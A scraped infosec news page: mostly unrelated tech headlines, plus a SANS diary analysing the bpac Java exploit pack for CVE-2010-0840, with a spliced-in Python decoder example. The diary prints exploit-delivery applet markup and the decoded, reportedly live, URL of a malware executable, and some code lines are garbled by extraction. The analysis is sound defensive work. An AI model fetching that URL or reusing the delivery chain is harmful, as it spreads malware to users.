InfoSec News

Motorola's mobile phone subsidiary has filed a lawsuit against Microsoft alleging the world's largest software maker has infringed 16 of its patents in PC, mobile and server software, as well as Xbox products.

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.
Everyone at Google is getting a nice raise. Well, almost everyone. The worker who leaked information about the raises has been fired, reports say.
Apple Mac OS X Prior to 10.6.5 Multiple Security Vulnerabilities
Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
Apache Subrequest Handling Information Disclosure Vulnerability
Neon 'ne_xml*' expat XML Parsing Denial of Service Vulnerability
T-Mobile has kicked off sales of Samsung's Galaxy Tab, and bigger carriers are soon to follow. Will the new Android tablet slow down iPad sales?
Small businesses need phone service and online meeting tools to get started. Instead of going for separate tools, Virtual Office Pro bundles both services for $50/month. With it, you get unlimited voice calling and online conferencing.
PHP xmlrpc Extension Multiple Remote Denial of Service Vulnerabilities
Oracle MySQL Malformed Packet Handling Remote Denial of Service Vulnerability
Oracle MySQL 'COM_FIELD_LIST' Command Buffer Overflow Vulnerability
The recent Java JRE patch bundle released by Oracle contained a long list of security fixes, several of them for vulnerabilities that allow drive-by exploits. And since Java is present on pretty much every Windows PC, and people don't seem to do their Java updates quite as diligently as their Windows patches, there are A LOT of vulnerable PCs out there. Microsoft reported on this a month ago, and called it an unprecedented wave of Java exploitation.
It doesn't look like the situation has improved since, and the bad guys are taking advantage. Not surprisingly, the FAQ document on "Virus found in my Java Cache Directory" is ranked the third most popular of all the issues listed. The two issues ranked ahead of it are also security concerns. Not a pretty picture for Oracle or Java, I'd say.
Let's take a look at one of the popular exploits that are making the rounds, the bpac family. The exploit used is for CVE-2010-0840 (Hashmap), already covered by the Java patch bundle in July, but apparently still successful enough to be used. I guess the bad guys won't start burning their newest Java exploits while the old set is still going strong.
The infection usually happens as follows:

(1) User surfs to website that has been injected with the exploit

(2) Exploit pack triggers - it comes as an obfuscated JavaScript that downloads an Applet and a PDF

(3) The applet contains an exploit, here for CVE-2010-0840

(4) The applet is invoked with a parameter that tells it where to find the EXE

(5) If the exploit is successful, the EXE is downloaded and run
The EXEs pack quite a punch: one recent sample submitted contained no fewer than 66 other malicious EXEs. Yes, a user would be bound to notice this deluge of badness, but he still wouldn't stand a chance of ever cleaning ALL of this crud off the system again.
Looking at the malware in more detail
-rw-r--r-- 1 daniel users 3738 2010-11-08 09:14 euinirascndmiub.jar
-rw-r--r-- 1 daniel users 21009 2010-11-08 09:13 fuiqaubuk7.php
-rw-r--r-- 1 daniel users 6095 2010-11-08 09:14 jmkohwbrbtgsboj.pdf
The PHP file invokes the applet with a parameter:
[email protected]:~/malware$ head fuiqaubuk7.php
<body id='jmery7' name='jmery7'><applet code='bpac.a.class' archive='euinirascndmiub.jar'><param value='RSS=,[email protected]=R=' name='a'></applet></body><textarea>function goyla(hrcsyoe6){r .....
The JAR file is basically a ZIP, so we can unzip it:
[email protected]:~/malware$ unzip euinirascndmiub.jar
Archive: euinirascndmiub.jar
inflating: bpac/a$1.class
inflating: bpac/a.class
inflating: bpac/b.class
inflating: bpac/KAVS.class
From the PHP, we know that a.class is the code that gets executed. A Java decompiler like jad can convert the class files back into something readable, akin to Java source code:
[email protected]:~/malware/bpac$ jad *.class
Generating a.jad
Generating b.jad
Generating KAVS.jad
Generating a$1.jad
On inspection, a.jad indeed contains the CVE-2010-0840 exploit, pretty much a carbon copy of the Metasploit original. More interesting is b.jad, because it contains
String s1 = (new StringBuilder()).append(s.replace('F', 'a').replace('#', 'b').replace('V', 'c').replace('D', 'd').replace('@', 'e').replace('Y', 'f').replace('C', 'g').replace('R', 'h').replace(, etc
which sure looks like a decoding function. It doesn't take much programming to turn this into a Java file of its own with a print statement at the end. When we then add the variable that was set when the applet was invoked, we get
public class x
{
    public static void main(String[] args)
    {
        String s = "RSS=,[email protected]=R=";
        String s1 = (new StringBuilder()).append(s.replace('F', 'a').replace('#', 'b').replace('V', 'c').replace('D', 'd').replace('@', 'e').replace('Y', 'f').replace('C', 'g').replace('R', 'h').replace(, 'i').replace('L', 'j').replace('K', '-').replace('U', 'k').replace('^', 'l').replace('Z', 'm').replace('B', 'n').replace('Q', 'o').replace('=', 'p').replace(, 'q').replace('M', 'r').replace('G', 's').replace('S', 't').replace('!', 'u').replace('W', 'v').replace('%', 'w').replace('H', 'x').replace('P', 'y').replace('?', 'z').replace('T', '/').replace('I', '.').replace('K', '_').replace('(', '_').replace(',', ':').replace('A', '1').replace('N', '2').replace('*', '3').replace('J', '4').replace(')', '5').replace('O', '6').replace('$', '7').replace('X', '8').replace('+', '9').replace('E', '0')).append("?i=1").toString();
        System.out.println(s1);
    }
}


Compile with javac, run with java, and lookie, the system prints:
[email protected]:~/malware/bpac$ java x

http://78. 26.187. 64/sex/hrd1.php?i=1 (spaces added to keep you from clicking, careful, still live!)
which is where the EXE resides. VirusTotal currently detects it with 14/43.
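The decoding routine above, reimplemented in Python as an added example (not the diary's own code): the table is the one from b.jad, a sequential version mirrors the Java replace() chain, a single-pass version shows why the chain is order-independent, and the input is a constructed sample rather than the live value.

```python
# Decoder for the bpac applet parameter, rebuilt from the chained
# String.replace() calls in the decompiled b.jad. Added example, not the
# ISC diary's own code. The replace() calls producing 'i' and 'q' lost their
# source character in extraction, so those two entries are omitted here.

BPAC_TABLE = [
    ("F", "a"), ("#", "b"), ("V", "c"), ("D", "d"), ("@", "e"), ("Y", "f"),
    ("C", "g"), ("R", "h"), ("L", "j"), ("K", "-"), ("U", "k"), ("^", "l"),
    ("Z", "m"), ("B", "n"), ("Q", "o"), ("=", "p"), ("M", "r"), ("G", "s"),
    ("S", "t"), ("!", "u"), ("W", "v"), ("%", "w"), ("H", "x"), ("P", "y"),
    ("?", "z"), ("T", "/"), ("I", "."), ("K", "_"), ("(", "_"), (",", ":"),
    ("A", "1"), ("N", "2"), ("*", "3"), ("J", "4"), (")", "5"), ("O", "6"),
    ("$", "7"), ("X", "8"), ("+", "9"), ("E", "0"),
]


def decode_sequential(s: str) -> str:
    """Mirror the applet exactly: one replace() after another, in order."""
    for src, dst in BPAC_TABLE:
        s = s.replace(src, dst)
    return s


def chain_is_order_independent() -> bool:
    """True when no replace() output is a later replace()'s input; only then
    does the ordered chain equal one simultaneous substitution."""
    for i, (_src, dst) in enumerate(BPAC_TABLE):
        if any(dst == later_src for later_src, _ in BPAC_TABLE[i + 1:]):
            return False
    return True


def decode_bpac_param(s: str) -> str:
    """Single-pass decode plus the '?i=1' suffix the applet appends."""
    table = {}
    for src, dst in BPAC_TABLE:
        table.setdefault(src, dst)  # the second 'K' entry is dead code
    return s.translate(str.maketrans(table)) + "?i=1"


# Constructed sample: a benign URL in the 198.51.100.0/24 documentation
# range, encoded with the inverse table (not the diary's live value).
SAMPLE_PARAM = "RSS=,TTA+XI)AIAEEI$TC@ST^QFDI=R="

if __name__ == "__main__":
    print(decode_bpac_param(SAMPLE_PARAM))  # http://198.51.100.7/get/load.php?i=1
    print(chain_is_order_independent())     # True
```

Note that the sample begins with the same "RSS=," prefix as the live parameter, which is simply "http:" under this table.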

Bottom line: If you haven't done so yet, hunt down and patch every incarnation of Java on the PCs that you are responsible for.
Hewlett-Packard will pay $16.25 million to settle a case that resulted in jail time for a school district's former chief technology officer and computer reseller of HP equipment, the U.S. Federal Communications Commission said on Wednesday.
The FCC confirmed on Wednesday that it is investigating whether Google broke any federal eavesdropping laws when collecting data for its controversial Street View mapping service.
Hewlett-Packard will pay $16.3 million in a settlement of alleged fraud involving a U.S. Federal Communications Commission program to bring Internet access to schools and libraries in poor areas, the FCC and U.S. Department of Justice announced on Wednesday.
When e-mail arrived more than 40 years ago it ushered in a way to share small text-only messages. The emphasis was on creating a system with no single points of failure, where all users would have a unique address on a ubiquitous system.
A coming revolution in 3D printing, with average consumers able to copy and create new three-dimensional objects at home, may lead to attempts by patent holders to expand their legal protections, a new paper says.
Startup XI3 announced a modular computer with components that it says can be easily repaired or upgraded, which could help users save money and keep up with changes in technology.
Gamers looking for a powerful yet portable machine can stop looking. The Asus G73Jw is here. It's only a mild update to Asus's most recent previous lean, mean, gaming machine, the G73Jh. But with a slightly faster processor (a 1.73GHz Core i7 740QM vs. a 1.6GHz 720QM), a Blu-ray combo drive, and improved battery life (2.5 hours vs. 1.75 hours), the G73Jw is definitely an upgrade. Unfortunately, Asus didn't redesign the notebook's exterior features at all, and the keyboard remains a serious weakness.
Cisco Systems posted gains in both profit and revenue on Wednesday for its fiscal first quarter that ended Oct. 30, despite what it called "a challenging economic environment."
Major market shifts in the database world don't happen often. When they do, they're massive, creating an impact that can last 10 to 20 years. When I entered the job market, it was right at the tail end of the last major shift from the mainframe to client/server.
Of all that has been written about cloud computing, precious little attention has been paid to authentication in the cloud.
Microsoft today explained why it has not patched older versions of its Office for Mac, but would not disclose a release schedule for doing so.
Aerospace manufacturer Esterline Technologies said it expects to save significant sums by using LifeSize videoconferencing technology rather than that offered by industry leaders Cisco and Polycom.
eBlog 1.7 Multiple SQL Injection Vulnerabilities
Re: Kernel 0-day
EMC has acquired mainframe virtual tape library vendor Bus-Tech for an undisclosed amount, a buyout it hopes will help it offer end-to-end support for enterprise mainframe backup environments.
Smart card vendor Gemalto introduced a new credit card capable of generating one-time passwords for electronic banking and payment transactions.
ISC DHCP Server Relay-Forward Empty Link-Address Field Denial of Service Vulnerability
Sybase IQ will soon be run on a Massively Parallel Processing (MPP) architecture
SugarSync today announced it has more than doubled its free service offering, unveiling a new 5GB plan.
Consumer Reports has added Apple's MacBook Air to its list of recommended laptops, putting the 13-in. model in a tie with the 15-in. MacBook Pro as the second-highest rated notebook.
[ MDVSA-2010:226 ] dhcp
[USN-1015-1] libvpx vulnerability
Babylon Cross-Application Scripting Code Execution
T-Mobile USA kicked off sales of Samsung's 7-in. Galaxy Tab tablet computers today, and other U.S. carriers will soon follow suit.
Arm hopes to bring high-performance graphics applications such as 3D imaging and gaming to handheld devices like smartphones while keeping battery life intact with a new graphics processor design.
The company is giving each of its 23,000 employees across the globe a 10% raise effective in January, according to the Wall Street Journal.
Chip makers IPWireless and ST-Ericsson have joined forces to develop a platform designed to lower the cost of building Integrated Mobile Broadcast (IMB) technology into smartphones.
Don't look now, but the data center is transforming. Seeking greater efficiencies, enterprises of all sizes have steadily evolved from application-based silos to virtualized environments. Now this evolution is taking the next leap forward as innovative enterprises move toward next-generation cloud computing models that deliver IT as a service (ITaaS) -- via both internal and external cloud services.
There is a disease in the data center: skyrocketing energy costs, inefficient infrastructure management tools and the unknown effects of looming regulatory action in the United States.
A grand jury in San Francisco indicted three former executives from two manufacturers of color display tubes (CDTs) for charges related to an alleged global conspiracy to fix prices of the tubes used in computer monitors and other products.
HP today shared details on six countries that will become its global delivery hubs for enterprise services. In this Q&A, gets the lowdown on where jobs are being added and eliminated, lock-in concerns and the future of HP services.
ASPR #2010-11-10-2: Remote Binary Planting in Microsoft Word 2010
ASPR #2010-11-10-3: Remote Binary Planting in Microsoft Excel 2010
[ MDVSA-2010:225-1 ] libmbfl
The first commercial electronic paper displays that can show color were unveiled Wednesday at the Flat Panel Display International show in Japan. The screens open the way for electronic book readers like Amazon's Kindle and Sony's Reader to add color, but so far only a single Chinese device maker has committed to the technology.
ASPR #2010-11-10-1: Remote Binary Planting in Microsoft PowerPoint 2010
iDefense Security Advisory 11.09.10: Microsoft Word RTF File Parsing Stack Buffer Overflow Vulnerability
Kernel 0-day
[ MDVSA-2010:225 ] libmbfl
Open-source data integration vendor Talend is expanding its SOA footprint, announcing Wednesday that it has purchased Sopera, developer of an open-source enterprise service bus.
Smartphone sales for the third quarter almost doubled compared to last year, driven by explosive growth in sales of Android phones.
Both companies detailing HTML5 support in their development tools.

Infosec Priority: Change Mindset or Provide Training (blog)
The education and certification organization, (ISC)², recently held an event on building security into the software lifecycle, and asked the 50 or so ...

Keeping servers humming is both a science and a management art, practitioners say. Here are some approaches that work, from careful planning to routine maintenance and using automation tools.
Microsoft Tuesday released patches for four flaws in Office for Mac 2011, but failed to release fixes for the same flaws in the 2004 and 2008 versions.
Microsoft has a very slick device, but it can't do nearly as much as the iPhone -- especially in business
In India this week, President Barack Obama reshaped offshoring as part of international trade. Instead of complaining of jobs moving to Bangalore, the president's message to India's leaders was soothing, emphasizing how trade works both ways.

Messaging Architects Publishes New White Paper on "UK Email Retention Policies ...
PR Web (press release)
... organisations in the data security space; he is director of the Cyber Security Challenge UK, and a member of the InfoSec RSA Conference advisory boards. ...

Panasas today announced the next version of its ActiveStor 12 clustered storage array, with twice the throughput of its predecessor and up to 4 petabytes of storage in a 10-rack architecture.